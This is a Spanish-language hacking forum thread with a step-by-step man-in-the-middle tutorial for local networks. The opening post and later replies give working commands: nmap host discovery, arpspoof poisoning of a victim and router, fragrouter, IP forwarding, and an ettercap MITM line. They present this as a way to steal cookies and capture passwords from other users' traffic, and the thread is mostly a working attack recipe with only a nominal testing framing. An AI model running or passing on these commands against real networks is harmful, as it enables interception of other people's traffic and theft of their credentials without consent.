comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Realizando un ataque man in the middle (hombre en el medio) by arthusu

  • 12 Respuestas
  • 10559 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado arthusu

  • *
  • Underc0der
  • Mensajes: 552
  • Actividad:
    3.33%
  • Reputación 2
  • Yo solo se que no se nada - Socrátes
    • Ver Perfil
    • Arthusu BLOG
  • Skype: arthusuxD
« en: Agosto 01, 2012, 04:09:38 pm »
Bueno yo aquí no les voy a explicar que es esto ya que su palabra del titulo lo explica muy bien, digamoslo asi:
Pc victima ----- Pc atacante -----Modem

Entonces la pc atacante captura todo el trafico  xD! Pero para mejor explicación wikipedia ;)

Asi que yo voy a lo que voy xD, a realizar el ataque :P
Primero que nada nos conectamos a la red…


Tenemos que tener los sig… toos:
Backtrack5
Dsniff
Fragrouter
nmap


Para instalar dsniff y fragrouter:
sudo apt-get install dsniff fragrouter

el nmap en su web official y backtrack igual xD!

Vamos a escanear con el nmap  para buscar maquinas que estén activas… para ello usamos:
Nmap –sP 192.168.x.0/24

Donde las x seria dependiendo del modem donde empiezan las ip
Y la mascara que en este caso es 255.255.255.0 es por eso que le pongo 0/24 para escanear toda la red pero si eres de otro país y tienes otra mascara por ejemplo:

255.255.0.0 seria 0/16
255.0.0.0 seria 0/8

Ahora escaneamos…



Ahora con la ip al final .254 -> modem
.68 al final -> es la mia
.66 -> la victima
Ahora… a espoofear la arp de la victima
Sudo arpspoof –i tarjeta_red –t ip_victima ip_router
Quedaría:
Sudo arpspoof –i wlan0 –t 192.168.1.66 192.168.1.254



Para conseguir tu ip y la tarjeta_red pon ifconfig en una linea de comandos


Y para saber si es el modem el mismo nmap lo dice Huawei es una marca de modem ;)

Ahora a con el router:
Fragrouter –B1



Ejecutaremos ahora wireshark para ver el trafico… en una consola: wireshark & para segundo plano xD



Ahí vemos la captura de paquetes con esto podemos robarnos unas cookies, o no se que se les ocurra xD!....
Bueno en este caso como soy chico bueno… vemos que no capturamos nada mas que sabemos que esta mirando un video de youtube como visitante :P



Espero les haya gustado este tuto no soy muy bueno explicando pero se hace lo que se puede xD jeje saludos :p

Pentest - Hacking & Security Services

Contact me: arthusu@gmail.com

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #1 en: Agosto 01, 2012, 06:41:39 pm »
Buen Aporte sigue así!

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado WARsec

  • *
  • Underc0der
  • Mensajes: 88
  • Actividad:
    0%
  • Reputación 0
  • "tierra de libertad,casa de los valientes."
    • Ver Perfil
« Respuesta #2 en: Agosto 02, 2012, 10:22:46 pm »
buen tutorial , pero todo esto lo puedes hacer solo con wireshark cierto? o solamente con todas esas tools?

Desconectado arthusu

  • *
  • Underc0der
  • Mensajes: 552
  • Actividad:
    3.33%
  • Reputación 2
  • Yo solo se que no se nada - Socrátes
    • Ver Perfil
    • Arthusu BLOG
  • Skype: arthusuxD
« Respuesta #3 en: Agosto 02, 2012, 11:36:10 pm »
buen tutorial , pero todo esto lo puedes hacer solo con wireshark cierto? o solamente con todas esas tools?
No se si con wireshark solamente se pueda hacer eso pero si quieres hacerlo con una sola tool utiliza ettercap igual estas que use son en linea de comandos que no pesan mucho xD pero es como prefieras hacerlo este es mi modo de hacerlo asi me gusta xD
Pentest - Hacking & Security Services

Contact me: arthusu@gmail.com

Desconectado zoro248

  • *
  • Underc0der
  • Mensajes: 242
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #4 en: Agosto 07, 2012, 08:16:38 pm »
mmmm, interesante, voy a intentar hacerlo con BlackUbuntu




..Saludos ---> :D :D :D

Desconectado PussyMagnet

  • *
  • Underc0der
  • Mensajes: 6
  • Actividad:
    0%
  • Reputación 0
  • Social cockroach
    • Ver Perfil
    • Email
« Respuesta #5 en: Agosto 18, 2012, 02:26:14 pm »
Yeah! vi un ataque muy similar y otro ampliado hace unos 3 meses en Replica 8.8... la charla fue de DarkOperator

Buen post! gracias!

Desconectado beef

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #6 en: Agosto 18, 2012, 04:05:37 pm »
windows:
Crear red adhoc, sniffear packets con wireshark.

Desconectado aizenus

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #7 en: Marzo 24, 2013, 09:46:36 am »
Buenas tardes,

Interesante manual,estoy haciendo pruebas con mi red,estoy con un pc de mesa usando backtrack5 r3 y al lado tengo un portatil que lo tengo de victima para mis pruebas,pero tengo un problema al usar el comando que pones:

Yo pongo wlan1 porque es mi interface,la ipdevictima pongo la de mi postatil y alfinal la de host la de mi router

arpspoof –i wlan1 –t ipdemiportatil ipdemirouter

me devuelve esto como no lo hubiera puesto bien:

Version: 2.4
Usage: arpspoof [-i interface] [-t target] host



¿Alguna idea?

Gracias de antemano
« Última modificación: Marzo 24, 2013, 10:32:37 am por aizenus »

Desconectado 0xPandemic

  • *
  • Underc0der
  • Mensajes: 43
  • Actividad:
    0%
  • Reputación 0
  • Offensive Underground Security
    • Ver Perfil
    • Offensive Underground Security
  • Skype: blair.mandeville
« Respuesta #8 en: Marzo 24, 2013, 01:55:05 pm »
Para hacer un MITM asegurate que tu IPV4 tiene forwarding de paquetes, de otra manera podrias hacerle un denial of service a la red.
consola:

         
  •   echo 1 > /proc/sys/net/ipv4/ip_forward

para poder hacer sniff a todo el trafico de tu host y puerta de enlace usa lo siguiente:

         
  •    arpspoof -t 192.168.1.1 192.168.1.2 & >/dev/null
  •    arpspoof -t 192.168.1.2 192.168.1.1 & >/dev/null

donde 192.168.1.1 es el HOST (target) y 192.168.1.2 es tu puerta de enlace, prueba y me dices si te funciono, en teoria con lo anterior podras visualizar todo el trafico en ambas direcciones, de el host a puerta de enlace y al reves.
« Última modificación: Marzo 24, 2013, 01:57:32 pm por 0xPandemic »

Desconectado aizenus

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #9 en: Marzo 24, 2013, 03:18:06 pm »
Hola,gracias por responder

al lanza el comando cat /proc/sys/net/ipv4/ip_forward,me devuelve 1 asique creo que está bien

al lanzar arpspoof -t 192.168.1.34 192.168.1.1 & >/dev/null
 me devuelve  :

[1] 17707

root@bt:~# arpspoof -t 192.168.1.34 192.168.1.1 & >/dev/nullarpspoof: couldn't arp for host 192.168.1.34
« Última modificación: Marzo 24, 2013, 03:40:31 pm por aizenus »

Desconectado 0xPandemic

  • *
  • Underc0der
  • Mensajes: 43
  • Actividad:
    0%
  • Reputación 0
  • Offensive Underground Security
    • Ver Perfil
    • Offensive Underground Security
  • Skype: blair.mandeville
« Respuesta #10 en: Marzo 24, 2013, 03:45:18 pm »
Por que no utilizas mejor ettercap?

ettercap -T -M arp:oneway,remote /ip-victima/ /ip-gateway/

lo que hace es lo siguiente:

-T - inicializa ettercap en modo texto

-M realizara ataque man in the middle

ARP - indica que se utilizara envenenamiento de arp

oneway - indica que sera solo en una direccion

remote - indica al arp que sniffe no solo las conexiones directas sino tambien las remotas, como podria ser el caso de alguna puerta de enlace .


Desconectado aizenus

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #11 en: Marzo 24, 2013, 03:57:12 pm »
0xPandemic  gracias por ayudarme

Bueno he tenido que meter por medio -i wlan1 para que me reconozca mi interfaz,ahora por consola me sale mil cosas que no puedo leer,supongo que ahora ya puedo lanzar wireshark y podre ver el trafico no solo de mi pc,sino tambien el que va del portatil 1.34 al router 1.1 no?

Desconectado 0xPandemic

  • *
  • Underc0der
  • Mensajes: 43
  • Actividad:
    0%
  • Reputación 0
  • Offensive Underground Security
    • Ver Perfil
    • Offensive Underground Security
  • Skype: blair.mandeville
« Respuesta #12 en: Marzo 24, 2013, 04:12:35 pm »
Agrega la opcion -q a la linea de ettercap para que no te visualice todos los paquetes y prueba con wireshark para ver el trafico si gustas, aunque si lo que quieres son las passwords deberian de salir en la consola de ettercap.


#Si quieres te puedo ayudar por medio del chat , para no extender este tema tanto

 http://widget00.mibbit.com/?server=irc.ircnode.com&channel=%23underc0de&nick=E%3F%3F%3F%3F&autoConnect=true

 

¿Te gustó el post? COMPARTILO!



BruteSpray: automatizar el escaneo de puertos y hacer ataque por fuerza bruta

Iniciado por Gabriela

Respuestas: 5
Vistas: 2522
Último mensaje Noviembre 07, 2018, 10:43:38 pm
por redondord
[CONFERENCIA][VIDEO DESCARGA] Ataque a servidores web y seguridad en redes

Iniciado por graphixx

Respuestas: 0
Vistas: 1810
Último mensaje Marzo 12, 2016, 01:42:59 am
por graphixx
[CURSO] Tecnicas basicas y avanzadas de ataque y defensa Hacking

Iniciado por graphixx

Respuestas: 0
Vistas: 2804
Último mensaje Febrero 09, 2016, 04:50:39 am
por graphixx
[outlook] Vector de Ataque Web mediante ingeniería social

Iniciado por hielasangre

Respuestas: 3
Vistas: 2386
Último mensaje Febrero 11, 2014, 02:31:34 am
por Alvares97
[vide0]Xss+Set+Msf+Java applet infection+Ataque remoto

Iniciado por ju4nz123

Respuestas: 2
Vistas: 1884
Último mensaje Mayo 22, 2011, 04:57:16 pm
por ju4nz123